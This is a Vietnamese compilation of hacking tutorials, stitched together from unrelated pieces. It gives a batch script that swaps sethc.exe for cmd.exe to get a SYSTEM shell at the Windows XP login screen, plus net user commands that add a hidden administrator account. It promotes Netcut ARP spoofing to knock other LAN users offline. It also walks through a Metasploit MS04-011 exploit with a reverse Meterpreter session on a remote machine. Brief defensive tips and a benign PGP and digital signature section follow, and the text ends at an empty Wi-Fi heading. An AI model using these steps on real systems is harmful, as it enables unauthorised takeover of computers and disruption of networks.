Hack Password Của Administrator Trong Windows XP

Cách 1:
Hiện nay không có quá nhiều cách để phục hồi mật khẩu của tài khoản Administrator trong Windows bị quên mất. Có thể kể đến là dùng công cụ hỗ trợ của đĩa Hiren Boot để xóa trắng mật khẩu của tài khoản Administrator hay dùng các công cụ dò tìm mật khẩu trên Net. Tuy vậy, không phải lúc nào chúng ta cũng có công cụ để dùng. Nếu gặp những lúc như thế.... hãy lợi dụng lỗ hỏng của file sethc.exe trên Windows.

Trên Windows XP, nếu bạn nhấp phím Shift 5 lần, Windows sẽ gọi một chương trình nhỏ có tên là StickyKey. Đây là chương trình hỗ trợ người khuyết tật khi sử dụng Windows XP được đính kèm mặc đinh trong bộ tiện ích của Windows. Điều này có nghĩa là bạn có thể gọi chương trình này bằng phím tắt mà không cần đến giao diện thân thiện (1).

Nếu bạn đăng nhập bằng tài khoản có tên User1 và nhấp phím Shift 5 lần để gọi chương trình này, Windows sẽ lấy quyền của User1 để gọi chương trình StickyKey. Nếu bạn không đăng nhập vào bất kỳ một tài khoản nào mà gọi được StickyKey thì Widnows sẽ lấy quyên của hệ thống (System) để chạy StickyKey (2).
Từ giả định (1) và (2) trên, nếu bạn thay thế file thực thi của chương trình StickyKey (sethc.exe) bằng chương trình Command Run (cmd.exe) và gọi nó bằng 5 lần phím Shift mà không đăng nhập bằng tài khoản nào cả thì windows sẽ dùng quyền của Hệ thống (system) gọi file cmd.exe thay vì file sethc.exe. Thế là có thể làm bất cứ chuyện gì bằng tài khoản của cao nhất (quyền của Hệ thống) trên chương trình Command Run.

Cách thực hiện thủ thuật này:

Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử).

Bước 2: Vào Start >> Run >> nhập vào Notepad và Enter để gọi chương trình Notepad.exe. Copy đoạn mã của mình viết, past vào notepad, Save lại với tên là Hackpass.bat

REM Visit www.helloICT.com to learn more tips and tricks
REM Ghe tham trang web www.helloict.com de doc nhieu thu thuat hay
REM ---------------------------------------------------------------
REM Coded by BiBo

cd ystemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y

Sau đó nhấp kép chuột lên file Hackpass.bat để thực thi!

Đoạn mã này làm các nhiệm vụ sau:

1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk
2. Thay thế file sethc.exe bằng file cmd.exe

Đến đây, bạn nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công!

Chương trình StickyKey đã được thay bằng Ccmmand Run

Bước 3: Khởi động lại máy. Khi đến màn hình đăng nhập, bạn khoan hãy đăng nhập mà nhấn phím Shift 5 lần...... Lúc này chương trình Command Run xuất hiện, bạn nhập một trong những vào đoạn lệnh dưới đây

Xóa trắng password của Administrator:

net user Administrator

---- > nhấn phím Enter khi hoàn thành!

Thêm một tài khoản Admin với mật khẩu là 123

net user Admin 123 /add

---- > nhấn phím Enter khi hoàn thành!

Gán tài khoản Admin vào nhóm quản trị:

net localgroup Administrators Admin /add

---- > nhấn phím Enter khi hoàn thành!


Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo được các tài khoản mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy! 

Cách 2:
Cho đĩa Hiren Boot CD các bản mới vào làm đĩa khởi động. Menu xuất hiện với 9 mục lựa chọn...
* Bạn chọn mục 9.Next...
* Chọn tiếp mục 4.Password Tools...
* Chọn tiếp mục 1.Active Password Changer 2.1 (NT/2000/Xp)
*Chương trình có 3 lựa chọn
1.Choose Logical Drive:để chọn ổ đĩa muốn phá password ->Next
+ Lúc đó chương trình sẽ tìm kiếm những ổ đĩa nào có chứa Windows.
+ Sau khi bạn chọn tên ổ đĩa chương trình sẽ liệt kê các user đã được tạo trong Windows.
+ Bạn chọn đúng tên user mà bạn cần bỏ password
chương trình sẽ hiển thị dòng thông báo:
Would you like to reset this user''s password (Y/N) [N]:
Bạn có chắc chắn xoá password hay không?
Nếu bạn đồng ý reset lại password thì ấn chọn Y và chọn phím Enter.
thoát khỏi chương trình khởi động lại máy. Bạn kiểm tra xem còn password hay không?
chúc các bạn thành công!

Cách 3:
Bạn dùng phần mềm Ophcrack Live CD này tải về mà dò nó có 2 version một dùng cho win xp một dùng cho vista.
Với Ophcrack LiveCD, việc phục hồi mật khẩu đăng nhập Windows XP/Vista sẽ trở nên dễ dàng hơn bao giờ hết.

Đây là dạng đĩa tự khởi động trong môi trường DOS (LiveCD), mã nguồn mở và miễn phí. Bạn tải tập tin ISO dùng để tìm mật khẩu Windows XP tại địa chỉ http://tinyurl.com/5syhay (451.726 MB).

File ISO phục hồi mật khẩu cho Windows Vista được cung cấp tại http://tinyurl.com/5aqz4v (532.3 MB).

Tải xong, bạn ghi file ISO ra đĩa CD để có một LiveCD. Sau đó, bạn boot máy với đĩa LiveCD này. Quá trình khởi động sẽ nạp các tập tin cần thiết vào bộ nhớ RAM, nên bạn phải đợi trong chốc lá

Sử Dụng & Khắc Phục: Netcut

Bạn chỉ việc down về rồi chạy. Rất dễ sử dụng
Giới thiệu qua một chút về nó. Một phần mềm để ngắt các kết nối các máy trong một mạng LAN, ưu điểm cài đặt đơn giản, không phải thiết lập theo mô hình chủ khách, chỉ cần cài lên máy của mình đang ngồi và ngắt một máy bất kỳ cùng mạng với mình, rất có ích cho các bạn chia sẻ đường truyền internet.

Mục đích sử dụng để tìm hiểu và áp dụng vào những trường hợp cần thiết.

Dưới là video mình đã quay lại cách cài đặt và sử dụng, mời các bạn tham khảo.

Link download:

Tải phần mềm tại đây: ~2Mb - link megaupload (http://www.megaupload.com/?d=MMDW64U7)
Video hướng dẫn cách cài đặt và sử dụng - 5.5Mb - link megaupload (http://www.megaupload.com/?d=6XYOFYU7)

Dùng k-lite code để xem.


Netcut dùng arp spoofing để giả mac, máy victim sau khi bị netcut "úynh" thì bị nhận sai MAC của gateway, do đó bị "disconnect" khỏi internet. Để chống các arp spoofing dạng này thì ta đặt static mac cho client là khỏi sợ.

Đây là thí nghiệm trên máy tui.

1/ Trước :
Ping -t 210.245.24.20 và nhận được cái gói đều đều, kiểm tra bảng arp

Trích:

C:\Users\HieuDao>arp -a Interface: 192.168.7.240 --- 0x5 Internet Address Physical Address Type 192.168.7.200 00-1d-6a-0a-d8-ec dynamic

2/ Sau khi chạy netcut và cutoff máy tui

Các gói ping bị rớt, kiểm tra bảng arp thì thấy MAC của gateway bị thay đổi

Trích:

C:\Users\HieuDao>arp -a Interface: 192.168.7.240 --- 0x5 Internet Address Physical Address Type 192.168.7.200 21-1b-35-65-55-59 dynamic

3/ Xóa bảng arp và đặt static mac cho gateway thì các gói tin Ping -t 210.245.24.20 nhận lại bình thường, tui lại "dzô net" được rồi.

Trích:

C:\Users\HieuDao>arp -d C:\Users\HieuDao>arp -s 192.168.7.200 00-1d-6a-0a-d8-ec C:\Users\HieuDao>arp -a Interface: 192.168.7.240 --- 0x5 Internet Address Physical Address Type 192.168.7.200 00-1d-6a-0a-d8-ec static

P/s : là 1 Administrator thì phải nhớ theo dõi tình trạng nội mạng, khi rảnh ỗi thì tìm mấy cái tool detect promiscuous mode của NIC trên từng host, thấy thằng nào arp spoofing hay sniffer thì "kí đầu" nó
 Cách khúc phục:

Khi bạn sài chung mang với ai đó bạn vì rớt mạng hoài mà máy khác trong mạng vẫn không sao thì bạn hãy kiểm tra :
C1 : Nếu hub/swith / modem ở phòng bạn khi rớt mạng xem các máy khác có mạng không bằng cách nhìn vào đèn tín hiệu trên thiết bị xem đèn tên nào nhái theo nhịp truyền dữ liệu thì tên đó có kết nối được internet => khả năng tên này cao + hắn có chơi game hay film nhiều  không => đối tượng.
C2: Nếu có khả năng thì rút từng dây mạng kiểm tra , dây nào cấm vào mạng mà làm máy bạn không kết nối được internet là hắn.
C3: Tối ưu nhất là sử dụng phần mềm " Cain & Abel " . Bạn phải học cách sử dụng phần mềm này . Muốn biết tên nào phá bạn thì bật phần mềm này lên xem gói tin gửi về máy nào nhiều nhất là hắn chắc ( phần mềm này có nhiều cái hay và nó lại là con dao 2 lưỡi - hãy cẩn thận !).

Sử Dụng & Cách Khắc Phục: Metasploit Framework

I- Giới thiệu

Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Bạn có thể download chương trình tại đây (http://spool.metasploit.com/releases/framework-3.2.exe)

Metasploit có thể tự động update bắt đầu từ version 2.2 trở đi, sử dụng script msfupdate.bat trong thư mục cài đặt

II- Các thành phần của Metasploit

1- Metasploit hỗ trợ nhiều giao diện với người dùng:

-console interface: dùng msfconsole.bat. Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn

-Web interface: dùng msfweb.bat, giao tiếp với người dùng thông qua giao diện web

-Command line interface: dùng msfcli.bat

2- Enviroment

Global Enviroment:được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits

Temporary Enviroment: được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác

Bạn có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong /.msf/config và sẽ được load trở lại khi user interface được thực hiện

Những options nào mà chung giữa các exploits module như là: LPORT, LHOST, PAYLOAD thì bạn nên được xác định ở Global Enviroment
vd:
msf> setg LPORT 80

msf> setg LHOST 172.16.8.2

III- Sử dụng Metasploit framework

1. Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác

show exploits: xem các module exploit mà framework có hỗ trợ

use exploit_name: chọn module exploit

info exploit_name: xem thông tin về module exploit

Bạn nên cập nhật thường xuyên các lỗi dịch vụ trên www.metasploit.com hoặc qua script msfupdate.bat

2. Cấu hình module exploit đã chọn

show options: Xác định những options nào cần cấu hình

set : cấu hình cho những option của module đó

Một vài module còn có những advanced options, bạn có thể xem bằng cách gõ dòng lệnh show advanceds

3. Verify những options vừa cấu hình:

check: kiểm tra xem những option đã được set chính xác chưa.

4. Lựa chọn target: lựa chọn hệ diều hành nào để thực hiện

show targets: những target được cung cấp bởi module đó

set: xác định target nào

vd:
smf> use windows_ssl_pct

show targets

exploit sẽ liệt kê ra những target như: winxp, winxp SP1, win2000, win2000 SP1

5. Lựa chọn payload

payload là đoạn code mà sẽ chạy trên hệ thống remote machine

show payloads: liệt kê ra những payload của module exploit hiện tại

info payload_name: xem thông tin chi tiết về payload đó

set PAYLOAD payload_name: xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó

show advanced: xem những advanced options của payload đó

6.Thực thi exploit

exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin về hệ thống được khai thác

IV- Giới thiệu payload meterpreter

Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong Metasploit framework. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn câng các máy remote computers. Nó được viết từ các developers dưới dạng shared object( DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus

Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computers

Fs: cho phép upload và download files từ các remote machine

Net: cho phép xem thông tin mạng của remote machine như IP, route table

Process:cho phép tạo các processes mới trên remote machine

Sys: cho phép xem thông tin hệ thống của remote machine

Sử dụng câu lệnh

use -m module1,module2,module3 [ -p path ] [ -d ]

Câu lệnh use dùng để load những module mở rộng của meterpreter như: Fs, Net, Process..

loadlib -f library [ -t target ] [ -lde ]

Câu lệnh cho phép load các thư viện của remote machines

read channel_id [length]

Lệnh read cho phép xem dữ liêu của remote machine trên channel đang kết nối

write channel_id

Lệnh write cho phép ghi dữ liệu lên remote machine

close channel_id

Đóng channel mà đã kết nối với remote computer

interact channel_id

Bắt đầu một phiên làm việc với channel vừa thiết lập với remote machine

initcrypt cipher [parameters]

Mã hoá dữ liệu được gửi giữa host và remote machine

Sử dụng module Fs: cho phép upload và download files từ các remote machine

cd directory

giống lệnh cd của commandline

getcwd

cho biết thư mục đang làm việc hiện tại

ls [filter_string]

liệt kê các thư mục và tập tin

upload src1 [src2 ...] dst

upload file

download src1 [src2 ...] dst

download file

Sử dụng module Net:

ipconfig

route

xem bảng định tuyến của remote machine

portfwd [ -arv ] [ -L laddr ] [ -l lport ] [ -h rhost ] [ -p rport ] [ -P ]

cho phép tạo port forward giữa host và remote machine

Sử dụng module Process:

execute -f file [ -a args ] [ -Hc ]

câu lệnh execute cho phép bạn tạo ra một process mới trên remote machine và sử dụng process đó để khai thác dữ liệu

kill pid1 pid2 pid3

huỷ những processes đang chạy trên máy remote machine

ps

liệt kê những process của remote machine

Sử dụng module Sys:

getuid

cho biết username hiện tại của remote machine

sysinfo

cho biết thông tin về computername, OS

V- Ví dụ

Máy localhost có địa chỉ 192.168.1.1 sẽ tấn công máy remote có địa chỉ 192.168.1.2 thông qua lỗi Lsass_ms04_011. Đây là lỗi tràn stack trong dịch vụ LSA( Local Security Authority).Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory và các chính sách login. Lsass kiểm sóat việc chứng thực của cả client và server.

Msf>use Lsass_ms04_011

Msf>set PAYLOAD win32_reverse_meterpreter

Msf>set RHOST 192.168.1.2

Msf>set LHOST 192.168.1.1

Msf>exploit

Meterpreter> help

Meterpreter>use -m Process //add thêm tập lệnh của process

Meterpreter>help // xem các lệnh meterpreter hỗ trợ

Meterpreter>ps // list các process mà remote machine đang chạy

Meterpreter>kill // tắt các process mà remote machine đang chạy

Meterpreter> execute -f cmd –c // tấn công sử dụng comandline cmd của remote machine

execute: success, process id is 3516.

execute: allocated channel 1 for new process.

meterpreter> interact 1

interact: Switching to interactive console on 1...

interact: Started interactive channel 1.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>echo Meterpreter interactive channel in action

echo Meterpreter interactive channel in action

Meterpreter interactive channel in action

C:\WINDOWS>ipconfig

Caught Ctrl-C, close interactive session? [y/N] y

meterpreter>

VI-Cách phòng chống

Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như để Metasploit không thể khai thác được lỗi Lsass_ms04_011, bạn phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các hệ điều hành windows. Bạn nên sử dụng hotfix có number là 835732 để vá lỗi trên.

http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

Chữ Ký Điện Tử

- Khái niệm về chữ ký số (chữ ký điện tử): Chữ ký số hay còn gọi là chữ ký điện tử có thể được hình dung tương tự như chữ ký viết tay. Chữ ký điện tử được sử dụng trong các giao dịch điện tử. Xuất phát từ thực tế, chữ kí điện tử cũng cần đảm bảo các chức năng: xác định được người chủ của một dữ liệu nào đó: văn bản, ảnh, video, ... và dữ liệu đó trong quá trình chuyển nhận có bị thay đổi hay không. Tóm lại, mục đích chính của chữ ký số nhằm ngăn chặn việc thay đổi trong các tài liệu và cũng là để thực hiện việc kiểm tra tài liệu có thực sự được gửi bởi chủ thể cần giao dịch hay không. Chữ ký số dùng kỹ thuật mã hóa khóa công khai và khóa riêng (public key/private key cryptography). Bạn có thể cung cấp khóa công khai của bạn (public key) đến bất cứ người nào cần nó. Nhưng khóa riêng (private key) thì chỉ có bạn là người nắm giữ. Ví dụ cơ bản: Mike có hai khóa, một khóa công khai và một khóa riêng. Mike đưa khóa công khai của mình cho Amanda, nhưng giữ lại khóa riêng cho mình. Khi muốn chuyển tài liệu cho Amanda, Mike có thể xác nhận (ký) các tài liệu này dùng chính khóa riêng của mình và gửi chúng đến Amanda. Amanda sau đó sẽ dùng khóa công khai của Mike, để có thể kiểm tra tài liệu mà cô ấy nhận được, thực sự được gửi bởi Mike. Dùng chữ ký điện tử cho Email   Chúng ta hãy bắt tay vào ứng dụng cụ thể sau đây để hiễu rõ hơn về cách thức dùng chũ ký điện tử trong một giao dịch thông thường. Trong ví dụ này, chúng ta cần 2 tài khoản e-mail dạng POP3. Tài khoản e-mail POP3 thứ nhất được xác lập cho Mike (trong ví dụ này Mike sẽ dùng để gửi email và tài khoản thứ hai xác lập cho Amanda (Amanda sẽ dùng để nhận e-mails và kiểm tra chữ ký điện tử nhằm xác định các mails này đúng là đến từ Mike ) Cấn kiểm tra kết nối Internet đã sẵn sàng cho việc gửi và nhận e-mails. Xin nhắc lại, Mike chính là người gửi (sender) và Amanda sẽ là người nhận mails (receiver). Trong ví dụ này, website của công ty cổ phần Storks và các tài khoản emails của họ được một nhà cung cấp dịch vụ/lưu trữ Web (web hosting service) trên Internet duy trì. Nhà cung cấp dịch vụ Web cung cấp cho công ty Storks các thông tin về tài khoản email cho Mike và Amanda, những tài khoản sẽ được sử dụng trong ví dụ này. Tất cả nhân viên dùng e-mail tại Storks đều dùng Outlook Express hoặc Microsoft Outlook là chương trình Mail client mặc định của mình. Cài đặt một tài khoản email  POP3   1. Mike sử dụng Outlook Express là chương trình mail client mặc định của mình. Đăng nhập vào Windows XP Computer của mình (Pro-1). Mở Outlook Express từ menu chọn Tools, chọn Accounts.   2. Click vào Mail tab sau đó chọn Add, chọn tiếp Mail. Sau đó wizard sẽ hướng dẫn Mike từng bước để điền name, email address và thông tin về tài khoản POP3. các thông tin về tài khoản mail được cung cấp bởi ISAP hoặc nhà cung cấp dịch vụ Web (web hosting).   Lưu ý: Bạn cần cài đặt thêm một tài khoản POP3 thứ hai dành cho Amanda theo cùng cách thức trên để kiểm tra chữ ký điện tử của các tài liệu nhận được từ email của Mike. Thuê chứng chỉ số cá nhân (personal certificate) từ một nhà cung cấp chứng chỉ số công cộng (public CA) 3. Bước kế tiếp, để có thể gửi mail với chũ ký điện tử, Mike cần liên hệ và thuê chứng chỉ số cá nhân từ một nhà cung cấp chứng chỉ số tin cậy (trusted public CA), chẳng hạn như Verisign hay Thawte. Thuê chứng chỉ số từ bên cung cấp thứ ba (3rd party) được đánh giá tin cậy là điều cần thiết nếu bạn muốn chuyển email an toàn đến một người nhận không cùng trong tổ chức của bạn. Vì thông thường, trong một tổ chức, để đảm bảo an toàn cho các giao dịch nội bộ  dùng chữ ký điện tử, tổ chức đó thường sử dụng dịch vụ cung cấp chứng chỉ số an toàn của riêng mình (ví dụ cài đặt và triển khai dịch vụ cung cấp chứng chỉ số Certificate Authority –CA, trên Windows Server 2003) . Tuy nhiên nhà cung cấp chứng chỉ số cục bộ này không thường được sử dụng cho các giao dịch điện tử với các giao dịch không cùng tổ chức của bạn. Chính vì những lý do này, nên công ty Storks đã quyết định sử dụng chứng chỉ số của nhà cung cấp Thawte (www.thawte.com), để trang bị cho Mike trong các giao dịch email dùng chứng chỉ số cá nhân. Và Mike có thể đăng ký cho mình một tài khoản Personal Email Certificate hoàn toàn miễn phí tại đây. Truy cập weblink sau và tiến hành đăng ký để nhận chứng chỉ số cá nhân http://www.thawte.com/secure-email/personal-email-certificates/index.html   Lưu ý quan trọng: Bạn phải cung cấp cho Thawte thông tin cá nhân để xác định bạn. Các thông tin này là cần thiết và sẽ được các hệ thống CA của Thawte xử lý trong tiến trình cấp pháp chứng chỉ số cho bạn. Đảm bảo phải đọc tất cả các thông tin về việc cung cấp chứng chỉ số trên Website của Thawte và biết những việc gì cần thiết phải thực hiện trong suốt quá trình đăng ký. Bạn cần cung cấp thông tin cá nhân và trả lời 5 câu hỏi xác nhận cho chính mình.Sau khi đã thực hiện đăng ký, bạn sẽ nhận một email từ Thawte với những hướng dẫn cụ thể cách thức hoàn thành việc xin cấp chứng chỉ số. Sau quy trình này, bạn sẽ nhận tiếp một email khác xác nhận chứng chỉ số cá nhân của Thawte đã được cấp cho bạn. Chỉ cần click vào các link trên Email này và tiến hành cài đặt chứng chỉ số. Click Yes và OK khi thông báo Certificate Installation Complete xuất hiện .     Xác nhận điện tử cho các emails   Một khi chứng chỉ số cá nhân cho email đã được cài đặt , bạn có thể dùng nó làm chữ ký số và mã hóa các email gửi đi. 1. Mở Outlook Express dùng tài khoản email POP3 đầu tiên đã tạo ở trên. Chọn Tools, chọn Options và chọn Security tab. Trên tab này, chúng ta sẽ có một tùy chọn encrypt and digitally sign your outgoing messages. Click Apply và OK.   2. Click vào Create Mail và bạn sẽ thấy biểu tượng ruy băng đỏ ở góc trên bên phải. Điều này có nghĩa là email mà bạn gửi đi sẽ được xác nhận với chữ ký số. điền vào To: người nhận địa chỉ email là Amanda (email POP3 thứ 2 bạn tạo) Sau đó click Send.   3. Chuyển đến tài khoản email POP3 của Amanda và mở email nhận được từ Mike. Bạn sẽ thấy message mà Amanda nhận sẽ tương tự màn hình bên dưới. Click vào Continue để xem thông điệp thực sự .   Bạn hãy để ý ruy băng màu đỏ góc phải trên của mail. Điều này cho Amanda biết rằng Mike đã tiến hành gửi mail này dùng chữ ký số. Click vào biểu tượng ruy băng Đỏ để xem chữ ký số từ người gửi (sender). Kiểm tra và thấy rằng nội dung mail đã không bị thay đổi và chữ ký số này là đáng tin cậy. Có thể xem thông tin về chứng chỉ số cá nhân của sender bằng cách click View Certificate.   Mã hóa Emails   Mã hóa là một phương pháp bảo mật thực hiện việc chuyển đổi dữ liệu từ dạng thông thường (plain text) thành dạng không thể đọc theo cách thông thường (unreadable text) nhằm đảm bảo sự cẩn mật (confidentiality), tính tích hợp (integrity) và tính chất xác thực (authenticity) của dữ liệu . Khi bạn mã hóa email, thì toàn bộ email sẽ được mã hóa bao gồm phần thông điệp và các file đính kèm (attachments). Một chữ ký số sẽ đảm bảo tính chất xác thực (đúng là người gửi) và tính tích hợp (dữ liệu đã không bị thay đổi) nhưng không đảm bảo được tính chất bí mật (confidentiality) vì nội dung mail đã không được mã hóa. 1. Mở Outlook Express dùng tài khoản mail POP3 thứ 2 tức của Amanda’. Chọn Tools, chọn Options. Click vào Security tab. Đánh dấu vào hộp Encrypt contents and attachments for all outgoing messages. Click Apply và OK.   2. Click vào Create Mail và sẽ thấy xuất hiện biểu tượng ổ khóa lock ở góc trên bên phải. Điều này có nghĩa là email của bạn sẽ được mã hóa khi gửi. Điền vào địa chỉ  email người nhận là tài khoản POP3 của Mike và click Send.   3. Quay trở lai tài khoản mail POP3 của Mike và mở email mà Amanda vừa gửi. khi bạn mở email, bạn sẽ nhận được một thông điệp An application is requesting access to a protected item.   4. Click OK và sau đó chọn Continue để đọc nội dung email đã mã hóa.   5. Bạn có thể click biểu tượng ổ khóa màu xanh để xem thông tin chi tiết hơn về email đã mã hóa . Amanda  đã không xác nhận chữ ký số cho message này nên tại Digital Signature tất cả các dòng đều xác nhận không sử dụng n/a (not available).   Dùng PGP để mã hóa files   PGP (Pretty Good Privacy) là phần mềm miễn phí cung cấp khả năng mã hóa PGP trong gửi nhận email và truyền file hàng đầu hiện nay. Tuy nhiên nếu sử dụng cho mục đích thương mại, bạn cần mua phiên bản thương mại của PGP bao gồm nhiều tính năng hơn so với phiên bản miễn phí. Mục đích chính của PGP là mã hóa files nhằm đảm bảo an toàn khi được truyền qua Internet. Với PGP Freeware chỉ được sử dụng giới hạn như sau: • Được sử dụng mang tính chất cá nhân tại nhà, không liên quan đến các hoạt động sinh lợi nhuận (như tại môi trường của công ty) • Sinh viên tại các trường, học viên phi lợi nhuận • Các hội từ thiện, các viện, tổ chức phi lợi nhuận Có thể download phiên bản miễn phí của PGP tại weblink sau:     http://www.pgp.com/products/freeware.html Cài đặt PGP   Đăng nhập vào Windows XP có tên Pro-1 của bạn với quyền Administrator và khởi động quy trình cài đặt PGP bằng cách click đúp vào File cài đặt vừa download. Click Next, đọc các thỏa thuận về License, click Yes. Màn hình Read Me xuất hiện, click Next sau khi đọc xong phần này. Chọn No, I’m a New User, vì bạn là người mới sử dụng, chưa từng tạo và sử dụng các khóa của PGP trước đó (pre-existing keys).   Giữ nguyên các giá trị mặc định cho Destination Folder và click Next. Chọn các thành phần như hình minh họa, click Next. Click Next lần nữa và Finish để khởi động lại máy.   Đăng nhập lại vào máy với tài khoản của Mike (hoặc nếu Mike chính là Administrator , thì đăng nhập  bình thường như lần trước). PGP New User Configuration Wizard xuất hiện hướng dẫn Mike các thao tác. Click Next để tiếp tục. Chọn Yes sau đó click Next.   Kế tiếp chọn I am a New User. Create new keyring files for me. Click Next, sau đó Click Finish để hoàn thành.   Bạn sẽ thấy xuất hiện hộp thoại PGP License. Nếu đang dùng phiên bản free , click Later, ngược lại nếu muốn mua license, click Authorize.   6. PGP Key Generation Wizard sẽ xuất hiện. Click Next tiếp tục. Điền vào họ tên đầy đủ của bạn, và địa chỉ email, sau đó click Next. Trong ví dụ này là tên và địa chỉ email của Mike   7. Màn hình kế tiếp nhắc bạn điền vào passphrase, mục đích của passphrase là bảo vệ việc truy cập vào khóa riêng (private key). Nên sử dụng một passphrase sao cho an toàn (không dễ dàng có thể đoán hoặc dò ra). Điền một passphrase và xác nhận (confirm), sau đó click Next. Và chú ý rằng bạn là Mike , private key được tạo dành cho bạn, và không bao giờ được quên passphrase của mình. 8. Click Next sau đó, chọn Finish hoàn tất quá trình kích hoạt khóa.   Xuất khóa công khai (Public PGP Key)   Tại sao cần phải xuất (export) khóa công khai PGP. Câu trả lời đơn giản như sau. Mục tiêu của ví dụ này là làm sao Amanda có thể mã hóa một text file và sau đó gửi nó cho Mike dưới dạng file đính kèm (attachment) qua email. Để làm được điều này, Amanda cần phải có khóa công khai (public key) của Mike. Mike đã cài đặt và kích hoạt khóa PGP, và tiếp theo anh ấy sẽ xuất khóa công khai của mình, và sau đó chuyển khóa này đến cho Amanda để cô ấy có thể mã hóa nội dung text file và sau đó gửi trở lại cho Mike dưới dạng file đính kèm. Còn ngược lại trong trường hợp Mike sẽ gửi các files mã hóa cho Amanda, thì chính Amanda phải xuất các khóa công khai và chuyển nó cho Mike, để giao dịch an toàn xảy ra. 1. click chuột phải vào PGP lock nằm ở khay hệ thống và click tiếp PGPkeys.   2. Click Keys và sau đó Export. Điền vào tên file và lưu lại vào bất kỳ nơi nào dễ nhớ ví dụ: ổ C: hoặc đĩa mềm FDD 1.44”. Mike đã lưu file này vào đĩa mềm và chuyển đĩa mềm này đến cho Amanda. Và Amanda cũng sẽ làm tương tự.   Và chú ý trong ví dụ thực hành này, các thao tác tiến hành cài đặt và cấu hình PGP trên máy của Amanda, cũng sẽ tương tự như các thao tác mà các bạn đang thực hiện trên máy Mike nếu Mike muốn gửi các dữ liệu an toàn qua email cho Amanda, và như vậy Amanda sẽ dùng PGP kích hoạt khóa cho mình, sau đó xuất khóa công khai, lưu giữ vào đĩa mềm và chuyển khóa này cho Mike, Mike sẽ dùng khóa này đễ mã hóa dữ liệu , sau đó gửi dữ liệu cho Amanda Nhập khóa công khai PGP key   Một khi Amanda đã nhận được khóa công khai từ Miketrên đĩa mềm, co ấy cần nhập khóa này vào PGP software. 1. Click phải chuột vào PGP lock từ khay hệ thống và click PGPkeys. Click Keys và chọn Import. 2.Chọn khóa dưới tên file là Mike Bowers đã save vào đĩa mềm và click Open.   Select Mike Bowers và click Import. Thoát khỏi PGPkeys window. Và chú ý: theo hướng ngược lại Mike cũng cần nhập khóa công khai của Amanda gửi cho mình.   Kiểm tra việc mã hóa file sẽ gửi dùng PGP encryption   Tạo một text file trên desktop có tên Confidential. Click phải vào file và chọn PGP, chọn Encrypt & Sign.   Chọn người nhận là  Mike Bowers (recipient) và click OK.   Điền vào passphrase của Amanda vào và click OK. Mục đích của việc này nhằm xác nhận File đã được mã hóa để Mike có thể biết chắc chắn Amanda thực sự là người gửi.   Khi File đã được mã hóa dùng PGP, biểu tượng file sẽ thay đổi như hình minh họa. Và chỉ có những người sau đây có thể mở file này: Amanda (với passphrase của mình), Mike (với passphrase của anh ấy) và người nào đó đánh cắp được passphrase của Amanda hoặc Mike.   Amanda sau đó sẽ gửi file mã hóa này dưới dạng Attachment đính kèm email cho Mike.   Bấy giờ khi Mike tiến hành nhận mail và lưu file đính kèm trên Desktop.   Khi Mike click đúp vào file mã hóa, anh ấy cần đưa chính xác passphrase của mình vào và click OK. Nếu passphrase đúng, file sẽ được giải mã.   Mike đã mở file và xem được nội dung bên trong   PGP – Wipe (tính năng xóa File vĩnh viễn của PGP)   Khi một File đã được hệ thống delete thường vẫn còn tồn tại trên đĩa cứng của bạn và có thể dễ dàng được phục hồi chỉ với một phần mềm phục hồi dữ liệu và chút ít kỹ năng. Điều này khá nguy hiểm, vì những dữ liệu này có thể bị khai thác. Thông tin đã bị xóa vẫn hiện diện trên đĩa cứng và thường chỉ  mất đi nếu bị các thông tin mới ghi đè lên (overwritten) , ngay cả trong trường hợp này, với một số siêu công cụ phục hồi dữ liệu vẫn có thể phục hồi. Và PGP đã cung cấp cho chúng ta một tính năng, xóa dữ liệu vĩnh viễn là  PGP’s Wipe , thông tin đã xác định xóa với PGP wipe, mãi mãi sẽ không có cơ hội phục hồi. Sử dụng phương pháp ghi đè lên thông tin bị xóa một số các thông tin ngẫu nhiên vào những thời điểm đã xác định. 1. Mike sẽ kiểm tra tính năng này trên computer của mình. Right click trên Confidential file và chọn PGP, chọn Wipe.   2. Chọn file được liệt kê và click Yes. File sẽ bị xóa vĩnh viễn.

Bảo Vệ Mạng Không Dây ( Wi-Fi)

